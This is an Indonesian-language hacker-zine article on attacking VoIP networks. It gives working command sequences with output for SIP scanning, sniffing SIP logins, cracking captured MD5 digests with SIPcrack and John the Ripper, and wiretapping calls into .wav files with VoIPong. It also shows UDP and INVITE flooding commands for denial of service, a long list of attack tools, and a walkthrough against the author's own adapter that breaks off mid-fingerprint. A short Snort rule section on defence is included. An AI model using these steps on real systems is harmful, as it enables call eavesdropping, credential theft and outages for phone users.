Pages

ECHO MAGAZINE VOLUME IX, ISSUE XXIV, PHILE 0x06

Diposting oleh blacklokip on Jumat, 10 Februari 2012

-----[ Pendahuluan

Tulisan ini sengaja saya buat untuk semua orang yang masih ingin
belajar, jika juragan - juragan sudah pintar, tinggalkan saja tulisan
ini karena hanya memberikan rasa bosan dalam membacanya.


-----[ Kenalan dengan VoIP

Voice Over Internet Protocol atau biasa juga disebut VoIP, IP
Telephony, Internet Telephony atau Digital Phone merupakan teknologi
yang memungkinkan percakapan suara jarak jauh melalui media internet
(IP). Data suara diubah menjadi kode digital dan dialirkan melalui
jaringan yang mengirimkan paket-paket data, dan bukan melalui sirkuit
analog telepon biasa. Jadi VoIP itu adalah suara yang dikirim melalui
internet protokol (IP).

Tak kenal maka tak sayang, oleh karena itu ada beberapa hal yang harus
kita kenal dalam VoIP, diantaranya :

1. VoIP Signaling Gateway Protocol
   Apa lagi nih ?, yang pasti tidak sejenis kue klepon ataupun
   onde-onde.  VoIP Gateway Signaling Protocol merupakan protocol
   gateway yang bertugas membagi VoIP signal ke dalam bentuk frame data
   dan menyimpannya dalam bentuk voice packet, serta melanjutkan
   pengiriman voice packet mempergunakan protocol gateway yang mampu
   mengirim multimedia data packet.

   Ini adalah beberapa VoIP Signaling Gateway Protocol, diantaranya
   adalah :
  
   - H.323        : H.323
   - Megaco H.248    : Gateway Control Protocol
   - MGCP         : Media Gateway Control Protocol
   - RVP over IP     : Remote Voice Protocol Over IP
   - SAPv2         : Session Announcement Protocol
   - SDP        : Session Description Protocol
   - SGCP         : Simple Gateway Control Protocol
   - SIP         : Session Initiation Protocol
   - Skinny        : Skinny Client Control Protocol (Cisco)


2. VoIP Media Protocol
   Mau tahu VoIP Media Protocol ?, kalau mau tahu ada syaratnya loh,
   silahkan lari-lari kecil di kandang macan dulu atau joget bareng
   7icons deh *lol*.

   Protocol ini merupakan protocol yang bertugas melakukan konversi dan
   kompresi media ke dalam format tertentu yang dibutuhkan oleh VoIP
   Signaling. Protocol ini harus memiliki kemampuan untuk melakukan
   proses Audio, Video dan T.120 (Multipoint Data Conferencing and Real
   Time Communication Protocols) dengan berbagai kombinasi dan mampu
   melakukan penterjemahan media secara full duplex.

   Ini adalah beberapa VoIP Media Protocol, diantaranya :
 
   - DVB    : Digital Video Broadcasting
   - H.261    : Video stream for transport using the real-time transport
   - H.263    : Bitstream in the Real-time Transport Protocol
   - RTCP    : RTP Control Protocol
   - RTP    : Real-Time Transport


3. VoIP Audio Codec
   Kompresi dan dekompresi untuk VoIP audio file, seperti :

   - DoD CELP - 4.8 Kbps
   - GIPS Family - 13.3 Kbps and up
   - iLBC - 15 Kbps, 20ms frames / 13.3 Kbps, 30ms frames
   - ITU G.711 - 64Kbps (a.k.a. alaw / ulaw)
   - ITU G.722 - 48 / 56 / 64 Kbps
   - ITU G.723.1 - 5.3 / 6.3 Kbps, 30ms frames
   - ITU G.726 - 16 / 24 / 32 / 40 Kbps
   - ITU G.728 - 16 Kbps
   - ITU G.729 - 8 Kbps, 10ms frames
   - LPC10 - 2.5 Kbps
   - Speex - 2.15 to 44.2 Kbps, Free Open-Source codec


Untuk mendirikan VoIP Signaling dan VoIP Media, maka harus didirikan
VoIP Server, diantaranya adalah :

   - Asterisk (FYI : Asterisk is the world's most powerful and popular
     telephony development tool-kit)
   . Briker (base Asterisk)
   . Linux LiveCD VoIP Server
   . 3CX Phone System for Windows
   . ceWarp VoIP SIP Server
   . miniSipServer
   . FreeSentral


Itulah karakterisktik VoIP yang saya paparkan, semoga saja bisa
dipahami dengan baik.

Kini saatnya Anda untuk mengenal lebih jauh tindakan2 yang bisa
dilakukan terhadap jaringan VoIP istilah kerennya sih VoIP Attacking.

Yuk mari kita lanjutkan pada pembahasan yang mulai serius....*lol*.
       

-----[ VoIP Attacking Methodology

Sebelum melakukan penyerangan terhadap jaringan berbasis VoIP, beberapa
metode harus kita lakukan.

Apakah metode yang akan dijabarkan disini ampuh ?  Metode disini hanya
menjelaskan langkah-langkah yang dapat digunakan untuk menempuh
perjakanan dalam melakukan penyerangan. Masalah "bobol" atau "tidak"
sangat bergantung dalam setting perangkat tersebut, namun tetap
berpegang teguh dalam jargon "Nothing System 100% Secure..!!".

Tapi sebelumnya saya akan membahas tentang jaringan VoIP secara
levelisasi sehingga kita bisa memahami tindakan penyerangan dengan baik
dan benar.

VoIP sendiri bersandar pada jaringan komputer berbabasis TCP/IP, saya
memberikan gambaran levelisasinya sebagai berikut :

1. Level 1 : VoIP Protocol

Apa yang bisa kita lakukan pada level ini, ya kita bisa melakukan
kegiatan VoIP Fraud, SPIT (VoIP Spamming), Phishing, Malformed
messages, Invite/Bycancel, Flodding, Call Hijacking, Call Eavesdropping
dan Call Modification.

Pada Level 1 ini bisa terdiri dari beberapa tehnikal ancaman,
diantaranya :

* VoIp Interception & Modification : call black holing, call rerouting,
* fax alternation, conversation alternation, conversation degrading,
* conversation hijacking.  VoIp Eavesdropping : call patter tracking,
* number harvesting, fax recontruction, conversation recontruction.
* VoIP DoS : request flodding, malformed requests, malformed messages,
* QoS abuse, spoofed messages, call hijacking

note : silahkan di google untuk mengetahui lebih lanjut istilah2
tersebut, terus terang jika saya tulisan pengertian tersebut 1 per 1
maka tulisan yang saya buat ini tidak akan pernah selesai...lol


2. Level 2 : OS Security

Ini adalah level 2, kita akan melakkukan penyerangan jika level 1 tidak
bisa kita serang. Hasil penyerangan pada level ini juga akan memiliki
imbas terhadap jaringan VoIP yang sedang berjalan.

Apa yang bisa kita lakukan pada level ini?, santai masbro pada level
ini kita bisa melakukan kegiatan seperti : Buffer Overflows,
penyerangan dengan Worm, Crashing dengan DoS ataupun DDoS, Weak
Configuration (--kelalaian Admin yg terpesona dengan Ayu ting-ting).


3. Level 3 : Support Service

Apa lagi tuh ?, yang pasti bukan jajanan pasar melainkan services a.k.a
layanan yang berjalan pada devices yang menjadi target. Penyerangan
bisa langsung tertuju pada layanan yang berjalan pada devices VoIP,
misalkan saja : layanan FTP, layanan Telnet, layanan HTTP, layanan DHCP
dan layanan lainnya yang bisa kita dapatkan melalui kegiatan
"scanning".

Apa yang bisa kita lakukan terhadap layanan2 yang aktif ?, ya seperti
biasa saja misalnya melakukan kegiatan BruteForce (dictionary attack)
terhadap layanan Telnet, FTP, HTTP form Login, DHCP resource
exhaustion.

4. Level 4 : Network Security

Yuk kita serang bagian Network Security ..;), tentu saja yang berbasis
TCP dan UDP. Dengan cara apa menyerangnya?, serang saja dengan :
SYNflood, ICMP flooding, TFTP attack dan DDoS.

5. Level 5 : Physical Security

Hal ini kadang terlewatkan bahkan terlupakan, iya gak ?? sekali lagi
kita bisa melakukan penyerangan terhadap hal-hal yang tidak mendapat
perhatian, diantaranya : Total call server compromise, reboot, jamming.

6. Level 6 : Policies & Procedure

Hal ini adalah hal yang terpikirkan tapi hanya selintas, oleh karena
itu kita bisa melakukan penyerangan dari sisi level ini. Penyerangan
yang biasa dilakukan adalah : weak password, weak voicemail password,
abuse priviledge.


Nah, itulah levelisasi penyerangan yang bisa kita lakukan. Kini saatnya
mengenal metoda yang biasa digunakan, diantaranya :


1. VoIP Network Scanning

VoIP environment tidak hanya sekedar telephone dan VoIP server
melainkan juga ada services dan devices lainnya, seperti : routers and
VPN gateways, web servers, TFTP servers, DNS servers, DHCP servers,
RADIUS servers, firewalls, intrusion prevention systems, dan session
border controllers.

  smap    [Options]  < ip  |  ip/mask  |  host >

  root@bt:~# apt-get install slurm-llnl
  root@bt:~# ./smap 192.168.0.0/24

  hasil :

  smap 0.6.0 <hs@123.org> http://www.wormulon.net/

  Host        192.168.0.1:5060:    (ICMP    OK)    SIP    enabled
  Host      192.168.0.2:5060:    (ICMP    OK)    SIP    timeout
  Host        192.168.0.3:5060:    (ICMP    timeout)    SIP    enabled
  ...
  ...
  ...
  Host         192.168.0.150:5060:    (ICMP    OK)    SIP    enabled Asterisk  PBX  (unknown version)
  150    hosts scanned, 10    ICMP reachable, 3 SIP enabled

 *beberapa hal yg menunjukkan adanya VoIP : port 5060, SIP, Asterisk PBX

 root@bt:~# ./smap –o 192.168.0.1

 smap  0.6.0 <hs@123.org>  http://www.wormulon.net/

 Host    192.168.100.1:5060:    (ICMP OK)     SIP    enabled

 1 hosts scanned, 1 ICMP reachable, 51SIP enabled



2. VoIP Packet Capture

Menangkap paket data VoIP dalam jaringan target.

root@bt:~# tcpdump -s 0 -w net-capture.txt  udp -i eth0
tcpdump: WARNING: eth0: no IPv4 address assigned
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 byte
237    packets    captured
474    packets    received by filter
0    packets    dropped     by kernel



3. VoIP Snffing

Mengintip paket data VoIP dalam jaringan target (--awas...bisa
menimbulkan bintilan)

root@bt:~# ./sipdump -d sip-logins.dump -f simpan-capture.txt

SIPdump 0.1  (MaJoMu | www.remote-exploit.org )
----------------------------------------------------------------
* Using tcpdump data file 'simpan-capture.txt' for sniffing
* Starting to sniff with filter 'tcp or udp'
* Adding 192.168.0.1:50195 <-> 192.168.0.254:50451 to monitor list...id 0
* New traffic on monitored connection 0 (192.168.123.92 -> 192.168.123.99)
* Found challenge response (192.168.123.92:50195 <-> 192.168.123.99:50451)
* Wrote sniffed login 192.168.123.92 ->192.168.123.99 (User: '222') to dump
* file
* Exiting, sniffed 1 logins

3. VoIP Authentication

Hampir semua SIP Client dan SIP Devices mempergunakan proses
autentikasi berbasis HTTP  dengan digest/MD5 (RFC. 2617) yang memiliki
beberapa kelemahan sehingga mudah dilakukan proses cracking terhadap
passwordnya.

     SIPcrack + John The Ripper
    ----------------------------------
     root@bt:~# mkfifo lirvadictionary
     root@bt:~# john --incremental=alnum --stdout=8 >fifo lirvadictionary
     root@bt:~# ./sipcrack -w lirvadictionarycrack -d sip-logins.dump


     SIPcrack 0.1 ( MaJoMu | www.remote-exploit.org )
     ---------------------------------------------------------------

     * Reading and parsing dump file...
     * Found Accounts:

     No    Server         Client             User    Algorithm    Hash / Password

     1    192.168.0.1      192.168.0.23    5421    MD5         x546 / xxda1cc1


     * Select which entry to crack (1 – 1) : 1
     * Generating static MD5 hash...  e718xxxxxxxxxxxxx9ff6c25aab955b2
     * Starting bruteforce against user '5421'  (MD5 Hash: 'dfc9xxxxxxxxx546
     * c08dc3xxxxxxxxc1')
     * Loaded wordlist: 'lirvadictionary'
     * Tried 25 passwords in 100 seconds
     * Found password: 'user5xx1'
     * Updating 'sip-logins.dump'...done

     Note: proses cracking bisa berhari2.  



3.  VoIP Wiretapping

    Adalah proses merekam suara yang mengalir pada sambungan telephone.

     root@bt:~# ./voipong

     pasti gagal… karena kita belum membuat file : voipong.conf, yg isinya :

------------------------------------- voipong.conf --------------------------

     [GENERAL]
     logdir        = /var/log
     logfile        = voipong.log
     cdrfile        = /var/log/voipcdr.log
     networksfile    = /usr/local/etc/voipong/voipongnets
     pidfile        = /var/run/voipong.pid
     mgmt_ipcpath    = /tmp/voipongmgmt.sock
     soxpath        = /usr/bin/sox
     soxmixpath        = /usr/bin/soxmix
     modpath        = /usr/local/etc/voipong/modules
     mixwaves        = 0
     defalg        = lfp
     rtp_idle_time     = 10
     device        = eth0
     promisc        = 1
     snaplen        = 1500
     readtmt        = 500
     outdir        = /var/log/voipong/

     [FILTERS]
     startup    = "udp"


------------------------------------ voipong.conf -------------------------------------


root@bt:~# voipong
   
EnderUNIX VOIPONG Voice Over IP Sniffer starting...
Release 2.0, running on bt [Linux 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686]
(c) Murat Balaban http://www.enderunix.org/

root@bt:~# voipctl
Connected to VoIPong Management Console
System:
bt [Linux 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686]
voipong> shcall


ID          NODE1    PORT1        NODE2                  PORT2 STIME        DURATION
-----      ----------------    -----    ---------------- ---------    --------------------          ---------------

09534      192.168.0.1    05022    192.168.0.92    16260    13/02/07  17:26:32    9   seconds

Total      listed: 1

VoIPong Call File Recording :

root@bt:~# cd /var/log/voipong/20100610/
root@bt:~# ls *.wav
session-enc0-PCMU-8KHz-192.168.0.1,5022-192.168.0.92,16260.wav
session-enc0-PCMU-8KHz-192.168.0.1,5026-192.168.0.92,19088.wav

4. VoIP Flooding
   Adalah proses membanjiri VoIP devices dengan packet data secara terus menerus.


   UDF Flodding
   -----------------

  root@bt:~#./udpflood <EthernetInterface> <SourceName> <DestinationName> <SourcePort> <DestinationPort> <NumPackets>

  root@bt:~#./udpflood eth0 5000 lirva_machine asterisk_proxy 1000000

  ** mengirim paket data sebesar 1000000 ke udp asterisk_proxy

  root@bt:~#./udpflood eth0 hacker_box asterisk_proxy 9 5060 1000000

  ** mengirim paket data sebesar 1000000 ke udp asterisk_proxy pada port 5060

  SIP inviteFlood
  -------------------

  root@bt:~#./inviteflood <EthInt> <TargetUser> <TargetDomain> <DestinationIP> <NumPackets> –a Alias –I <SourceIP> –S <SourcePort> –d
  <DestinationPort> -l linestring –h -v

  root@bt:~#./inviteflood eth0 5000 asterisk_proxy asterisk_proxy 1000

  ** melakukan invite flood pada user “5000” dengan melakukan invite 1000 kali ke asterisk_proxy


-----[ Pertahanan

Jangan hanya bisa menyerang, lucu kan kalo cuma bisa menyerang tapi ga bisa
bisa bertahan....;) oleh karena itu sebaiknya kita bisa melakukan pertahanan
terhadap jaringan VoIP yang kita miliki.

Bagaimana cara mempertahankannya?, okay gan tenang n santai kalau bisa relax
biar nyangkut diotak sebenarnya sih simple saja, salah satunya adalah
membangun Snort Rule dan Snort SIP Rule, seperti berikut ini :


SNORT VoIP Rule :

# Mencegah flooding pada SIP

drop ip any any -> $HOME_NET  5060 (msg:"BLEEDING-EDGE VOIP INVITE Message
Flood"; content:"INVITE";depth:6; threshold: type both, track by_src, count 100,
seconds 60; classtype:attempted-dos; sid:2003192; rev:1;)

drop ip any any-> $HOME_NET 5060 (msg:"BLEEDING-EDGE VOIP REGISTER Message
Flood"; content:"REGISTER"; depth:8; threshold:type both, track by_src, count
100, seconds 60; classtype:attempted-dos;sid:2003193;rev:1;)


# Unauthorized responses from SIP Server

drop ip $HOME_NET 5060 ->    any any    (msg:"BLEEDING-EDGE VOIP Multiple
Unathorized SIP Responses"; content:"SIP/2.0 401 Unauthorized";    depth:24;
threshold: type both, track by _ src, count 5, seconds 360;
classtype:attempted-dos; sid:2003194; rev:1;)


SNORT SIP Rule :

#Rule submitted by rmkml

drop udp $EXTERNAL_NET any -> $HOME_NET  5060 (msg:"COMMUNITY EXPLOIT SIP UDP
Softphone overflow attempt";content:"|3B|branch|3D|"; content:"a|3D|";
pcre:"/^a\x3D[^\n]{1000,}/smi"; reference:bugtraq,16213; reference:
cve,2006-0189; classtype:misc-attack; sid:100000223; rev:1;)


Selesai sudah methodology penyerangan terhadap jaringan VoIP,
pelajarilah secara bertahap.


-----[ VoIP Attacking Tools

Nah, banyak sekali kegiatan yang bisa dilakukan dalam kegiatan
attacking terhadap VoIP, tentu saja hal tersebut disebabkan karena
berbasis IP.  

*maaf, tindakan ini hanya boleh dilakukan oleh orang dewasa dan sudah
berusia 17 tahun, nah llohhhh….??? Lol*, diantaranya : Sniffing, VoIP
Packet Creation and Flooding Tools, Fuzzing, Signaling Manipulation,
Media Manipulation.

Banyak sekali dukungan aplikasi/software yang bisa dipergunakan untuk
melakukan penetrasi testing terhadap security VoIP, yang pada akhirnya
tools tersebut digunakan untuk melakukan attacking terhadap VoIP,
diantaranya :

1. Voip Sniffing
  
   Beberapa tools yang dapat digunakan untuk sniffing adalah :

   - Etherpeek

   - ILTY ("I'm Listening To You")

   - AuthTool, dengan tools ini anda dapat mengetahui password user
     dengan menganalisa SIP traffic.

   - Cain & Abel, tools serba guna yang salah satunya  adalah memiliki
     kemampuan untuk merekonstruksi RPT media calls.

   - CommView VoIP Analyzer, merupakan VoIP analisis modul dari
     aplikasi commView yang mampu menangkap VoIP secara realtime dan
     melakukan analisa VoIP event, seperti call flow, signaling
     sessions, registrations, media streams, errors.

   - Oreka, aplikasi yang mampu merekam dan mengambil kembali audio
     stream yang dikirim oleh SIP.

   - PSIPDump, aplikasi yang dapat melakukan dumping SIP sessions (+RTP
     traffic, if available) yang berasal dari  pcap kedalam disk

   - rtpBreak, aplikasi yang dapat melakukan  rtpBreak detects,
     reconstructs dan analisis heuristics RTP session melalui  UDP
     network traffic.

   - RTCP packets.

   - VOMIT, aplikasi yang dapat mengkonversi hasil percakapan yang
     dilakukan oleh Cisco IP phone kebentuk *.wav dan dapat langsung
     didengarkan dengan menjalankan sound player.

   - Wireshark, multi-platform network traffic analyzer.

   - Web Interface for SIP Trace, aplikasi berbasis Web PHP yang
     mengizinkan attacker untuk melakukan koneksi secara remote dan
     melakukan penangkapan juga filterasi SIP dialog.

   - SIPomatic, aplikasi yang dapat mendengarkan percakapan yang
     terjadi pada SIP

   - SIPv6 Analyzer, aplikasi yang dapat menganalisa SIP dan IPv6.

   - UCSniff, aplikasi yang dipergunakan untuk melakukan proses audit
     terhadap jaringan VoIP dengan menjalankan beberapa test seperti :
     unauthorized VoIP eavesdropping terhadap SIP, Skinny signaling,
     G.711-ulaw and G.722 codecs, dan testing MITM ARP Poisoning mode.

   - VoiPong, aplikasi yang dapat menditeksi seluruh  VoIP calls  pada
     protocol pipeline, dapat melakukan encoded terhadap G711, dapat
     melakukan aktual dumps conversation dengan membuat file *.wav
     secara terpisah.  VoIPong dapat digunakan untuk penetrasi terhadap
     VoIP server berbasis :  SIP, H323, Cisco's Skinny Client Protocol,
     RTP and RTCP.



2. VoIP Scanning and Enumeration Tools

   - VoIPPack, tools yang digunakan untuk melakukan proses scannings,
     enumeration, dan password attacks terhadap jaringan VoIP.

   - enumIAX, aplikasi yang digunakan untuk melakukan login
     enumerator terhadap IAX2 (Asterisk)  dengan memanfaatkan REGREQ
     messages.

   - SCTPScan, aplikasi yang dapat melakukan proses enumerasi terhadap
     port SCTP yang terbuka tanpa melakukan koneksi terhadap SCTP
     secara penuh melainkan hanya memerlukan asosiasi terhadap remote
     host.  Dengan SCTPScan kita dapat melakukan proses scanning untuk
     mencari SCTP-speaking machines.

   - SIP-Scan, aplikasi SIP network scanner.

   - SIPcrack, aplikasi yang dapat melakukan proses cracking terhadap
     login SIP protocol  (SIPdump  melakukan sniffing  SIP logins
     melalui jaringan komputer dan SIPcrack untuk melakukan passsword
     bruteforce terhadap sniffed login)

   - iaxscan, aplikasi berbasis python yang digunakan untuk mendeteksi
     live IAX/2 hosts dan melakukan bruteforce terhadap account user.

   - iWa, IAX2 protocol Wardialer
   - SIPVicious Tool Suite, svmap, svwar, svcrack - svmap digunakan
     untuk SIP scanner dan menampilkan list SIP devices dalam range IP,
     sedangkan svwar bertugas untuk mendeteksi active extensions pada
     sebuah  PBX,  svcrack berperan melakukan cracking  password SIP
     PBX secara online.

   - SiVuS, SIP Vulnerability Scanner.

   - SMAP, SIP Stack Fingerprinting Scanner.

   - VoIPAudit, VoIP specific scanning dan vulnerability scanner.

   - nmap, network port scanner.

  - Passive Vul. Scanner, aplikasi yang dapat melakukan pengecekan
    terhadap kelemahan jaringan VoIP.
 
  - Sipflanker, aplikasi yang dapat mencari SIP devices  dengan
    menampilkan beberapa potensi kelemahan di dalam network yang
    terdapat VoIP.

  - SIPSCAN, aplikasi yang dapat melakukan username enumerator terhadap
    server SIP dengan mempergunakan metode : INVITE,REGISTER dan
    OPTIONS.


3. VoIP Packet Creation and Flooding Tools

   - IAXFlooder : packet flooder dengan membuat  IAX packets.
   - INVITE Flooder : melakukan SIP INVITE messages.
   - SiPBlast     : SIP Flood dengan mengemulasi secara masal CPE
     call traffic
   - kphone-ddos: mempergunakan KPhone untuk melakukan flooding.
     attacks dengan SIP packet yang  telah di sniffing.
   - NSAUDITOR     : Flooder SIP UDP traffic .
   - RTP Flooder: Melakukan flooding dengan  RTP Packets yang baik.
   - Scapy        : interactive packet manipulation program.
   - SIPBomber    : Aplikasi untuk melakukan testing terhadap
     sip-protocol testing tool.
   - SIPNess     : Tools untuk melakukan testing terhadap aplikasi SIP.
   - SIPp        : Traffic generator untuk  SIP protocol.
   - SIPsak        : VoIP swiss army knife.

4. VoIP Fuzzing Tools

   - Asteroid, aplikasi yang mampu melakukan "malformed SIP" dengan
     beberapa metoda seperti : INVITE, CANCEL, BYE, etc. yang dapat
     diberikan kepada pengguna VoIP Phone.

   - Codenomicon VoIP Fuzzers

   - Fuzzy Packet, aplikasi yang dapat memanipulasi pesan  dengan packet
     capturing, packet injection dan mengirimnya melalui jaringan. Selain
     itu dapat melakukan RTP  dan  poisoning.

   - Interstate Fuzzer, cuma sebagai  VoIP Fuzzer saja.

   - VoIP  Fuzzing Platform, aplikasi  fuzzing appliance untuk SIP,
     Diameter, H.323 and MGCP protocols.

   - ohrwurm, small and simple RTP fuzzer.

   - PROTOS H.323 Fuzzer, tools berbasis java yang dapat melakukan
     "malformed" yang dapat dikirim ke protocol H.323.

   - PROTOS SIP Fuzzer, tools berbasis java yang dapat melakukan
     "malformed" yang dapat dikirim ke Spirent ThreatEx : protocol
     fuzzer.

   - VoIPER, tools yang digunakan untuk melakukan testing terhadap VoIP
     security vulnerabilties secara mudah dan otomatis.


5. VoIP Signaling Manipulation Tools

   - BYE Teardown, aplikasi yang berupaya untuk memutuskan percakapan
     VoIP dengan melakukan SIP BYE sniffing

   - Check Sync Phone Rebooter, aplikasi yang dapat mengirimkan special
     NOTIFY SIP message dengan melakukan proses ‘reboot’ telephone
     tertentu.

   - H225regregject, Tools yang digunakan untuk memutuskan panggilan
     H.323.

   - IAXAuthJack, aplikasi yang biasa digunakan untuk tindakan
     penyerangan terhadap proses autentikasi sampai tingkat endpoint
     dengan tujuan untuk mendapatkan plaintext password melalui
     jaringan.

   - IAXHangup, aplikasi yang digunakan untuk memutuskan panggilan yang
     dilakukan oleh IAX.

   - SiPCPE, aplikasi yang mampu menguji  infrasturktur SIP protocol
     secara penuh dengan memasukkan SIP messages.

   - RedirectPoison, aplikasi yang bekerja pada SIP signaling
     environment dengan melakukan proses monitoring permintaan INVITE
     dan SIP akan memberikan respon secara langsung.

   - Registration Eraser, tools yang sangat efektif untuk melakukan
     tindakan DoS dengan mengirim SIP REGISTER dari messages yang telah
     disadap dan melakukan penghapusan user.

   - Registration Hijacker, aplikasi yang dapat melakukan spoofing
     terhadap SIP REGISTER messages dan mengalihkan seluruh incoming
     calls pada attacker.

   - SIP-Kill, aplikasi yang mampu melakukan proses Sniff terhadap
     SIP-INVITEs dan memutuskan panggilan.

   - SIP-Proxy-Kill, aplikasi yang mampu memutuskan SIP-Session

   - SIP-RedirectRTP, aplikasi yang mampu memanipulasi SDP headers dan
     mengalihkan RTP packets ke RTP-proxy.

   - SipRogue, multifungsi SIP proxy yang dapat menggabungkan diri
     dalam percakapan masal (talking parties)

   - VoIP Network Attack Toolkit, tools yang mampu melakukan
     penyerangan terhadap berbagai VoIP Protocol dengan memanfaatkan
     kombinasi nomor.


Wah, ternyata banyak sekali aplikasi2 yang bisa kita gunakan untuk
melakukan kegiatan attacking terhadap VoIP. Okeh deh selamat menikmati
saja tools tersebut. Siapkan diri Anda berbekal untuk melakukan
penyerangan terhadap jaringan berbasis VoIP.

-----[ Sample Attacking : VoIP Boomber

Wah .. serem sekali judulnya ?, yoi coy  sengaja dibuat agar terkesan
angker saja kok, semoga saja isinya tidak seangker judulnya.

Pada tulisan sebelumnya saya banyak menceritakan konsep dasar VOIP
attacking dan konsep metodologi untuk melakukan penyerangan terhadap
jaringan VoIP, maka kali ini kita akan melakukan penyerangan dan
melumpuhkan jaringan berbasis VoIP.

Ya, saya akan melakukan penyerangan terhadap perangkat VoIP yang ada di
rumah saya, perangkat tersebut hanya : VoIP ATA.

VoIP ? ATA ?, ya VoIP = Voice Over IP, sedangkan ATA = Analog Telephone
Adapter.

Intinya adalah sebuah perangkat yang membuat telephone rumahan (analog
phone) bisa dijadikan sebagai perangkat VoIP.

Kalo saya gambarkan topologinya sih kayak gini :

+----------------------------------------------------------------------+
| internet ----> wireless AP router ----> VoIP ATA ----> Analog Phone  |
+----------------------------------------------------------------------+

Nah, yang menjadi target saya adalah VoIP ATA. Perangkat ini akan saya
lakukan tindakan destruktif sehingga VoIP ATA tidak bisa digunakan
untuk sementara dan terputus dari jalur VoIP services.

Teknik penyerangan ini berlaku pada semua pemodelan VoIP alias tidak
terbatas pada topologi yang disimulasikan.

Persiapan :
1. Laptop
2. OS Backtrack, saya menggunakan Backtrack 5 code name : Revolution
3. wlan0, saya mempergunakan jaringan wireless dalam penyerangan


Kegiatan Penyerangan :

1. Memastikan IP pada interface wlan0.  Ya, saya harus memastikannya
   karena saya terkoneksi pada sebuah Wireless AP Router sehingga   DHCP
   server memberikan IP untuk devices yang saya pergunakan :

   root@bt:~# ifconfig
  
   0-------------------------------------------------------------------------------0
   0  wlan0     Link encap:Ethernet  HWaddr 00:1c:bf:00:5e:fb               0         
   0            inet addr:192.168.1.68  Bcast:192.168.1.255  Mask:255.255.255.0    0
   0            inet6 addr: fe80::21c:bfff:fe00:5efb/64 Scope:Link           0
   0            UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1           0
   0            RX packets:6277 errors:0 dropped:0 overruns:0 frame:0                 0
   0            TX packets:20451 errors:0 dropped:0 overruns:0 carrier:0       0
   0            collisions:0 txqueuelen:1000                       0
   0            RX bytes:6358679 (6.3 MB)  TX bytes:1733016 (1.7 MB)           0
   0-------------------------------------------------------------------------------0
   
   Analisa :
   Nah, laptop saya sudah mendapatkan IP dari DHCP Server, yaitu : 192.168.1.68,
   mari lanjutkan pada langkah berikutnya.



2. Melakukan scanning untuk mengidetifikasikan host live.
   Pada langkah pertama sudah didapatkan IP : 192.168.1.68, maka
   langkah berikutnya saya akan melakukan pencarian informasi yang
   lebih mendalam dengan melakukan  scanning massal.

   Disini hanya diperlukan sedikit analisa saja, yaitu menentukan 1
   segment range IP yang akan di scanning massal, maka 1 range IP
   tersebut adalah IP : 192.168.1.1 sampai dengan IP : 192.168.1.254.
   Saya mempergunakan NMAP dengan metoda "intense scan & no ping",
   dengan perintah sbb :

   root@bt:~# nmap -T4 -A -v -Pn 192.168.1.1-254


   ------------------------------------------------------------------------------

   1     Starting Nmap 5.51 ( http://nmap.org ) at 2011-10-31 23:55 WIT           
   2     NSE: Loaded 57 scripts for scanning.                       
   3     Initiating ARP Ping Scan at 23:55                       
   4     Scanning 67 hosts [1 port/host]                        
   5     Completed ARP Ping Scan at 23:55, 1.87s elapsed (67 total hosts)      
   6     Initiating Parallel DNS resolution of 67 hosts. at 23:55                 
   7     Completed Parallel DNS resolution of 67 hosts. at 23:55, 0.05s elapsed
   8     Nmap scan report for 192.168.1.2 [host down]                   
   9    
   10   
   11   
   12    Initiating SYN Stealth Scan at 23:56
   13    Scanning 192.168.1.80 [1000 ports]
   14    Discovered open port 80/tcp on 192.168.1.80
   15    Completed SYN Stealth Scan at 23:56, 1.48s elapsed (1000 total ports)
   16    Initiating Service scan at 23:56
   17    Scanning 1 service on 192.168.1.80
   18    Completed Service scan at 23:56, 5.01s elapsed (1 service on 1 host)
   19    Initiating OS detection (try #1) against 192.168.1.80
   20    NSE: Script scanning 192.168.1.80
   21    Initiating NSE at 23:56
   22    Completed NSE at 23:56, 9.03s elapsed
   23    Nmap scan report for 192.168.1.80
   24    Host is up (0.0026s latency).
   25    Not shown: 999 closed ports
   26    PORT   STATE SERVICE    VERSION
   27    80/tcp open  tcpwrapped
   28    MAC Address: 00:23:69:7C:2B:E4 (Cisco-Linksys)
   29    Device type: VoIP adapter
   30    Running: Sipura embedded
   31    OS details: Sipura SPA-1001 or SPA-3000 VoIP adapter
   32    Network Distance: 1 hop
   33    TCP Sequence Prediction: Difficulty=262 (Good luck!)
   34    IP ID Sequence Generation: Incremental
   35    Read data files from: /usr/local/share/nmap
   36    OS and Service detection performed. Please report any incorrect results
   37    at http://nmap.org/submit/ .
   38    Nmap done: 254 IP addresses (3 hosts up) scanned in 81.30 seconds
   39    Raw packets sent: 4673 (203.516KB) | Rcvd: 3087 (129.594KB)

   ---------------------------------------------------------------------------------

   Analisa :

   Wah, hasil laporan NMAP begitu panjang dan menggoda pasti disukai
   para wanita lol, sehingga didapatkan informasi  bahwa pada IP :
   192.168.1.80 terindikasi sebagai perangkat VoIP.
  
   Kok tau itu perangkat VoIP?, gini masbro perhatikan pada baris
   29,30,31.

   Baris-baris tersebut menunjukan kalau itu adalah perangkat VoIP.
   Perhatikan juga pada baris 27 "80/tcp open  tcpwrapped" yang
   mengindikasikan bahwa perangkat VoIP tersebut mengaktifkan metoda
   penyetingan berbasis web base (http) yang dapat menjadi target
   penyerangan berikutnya.

   Untuk lebih detailnya maka akan dilakukan proses "fingerprint" pada
   langkah berikutnya.


3. FingerPrint
   Okay...kegiatan ini hanyalah kegiatan untuk memastikan bahwa target
   yang menjadi incaran adalah benar-benar target alias kagak salah
   sasaran.

  
   root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.1-254

   +-------------------------------------------------------------------------+
   | SIP Device        | User Agent               | Fingerprint              |
   +-------------------------------------------------------------------------+
   | 192.168.1.80:5060 | Linksys/PAP2T-3.1.15(LS) | Linksys/PAP2T-3.1.15(LS) |
   +-------------------------------------------------------------------------+

   Analisa :
   Uhhhuuuyyyy, ternyata benar bahwa IP 192.168.1.80 adalah perangkat
   VoIP dengan SIP Port 5060.  Tidak hanya itu, merk dan series
   perangkat VoIP pun bisa didapatkan yaitu : Linksys/PAP2T-3.1.15(LS).
   Mari mang, kita lanjutkan pada proses fingerprint yang lebih bermutu
   :


   root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.80 -d


   -----------------------------------------------------------------------------------------  
 
   1 ('192.168.1.80', 5060)
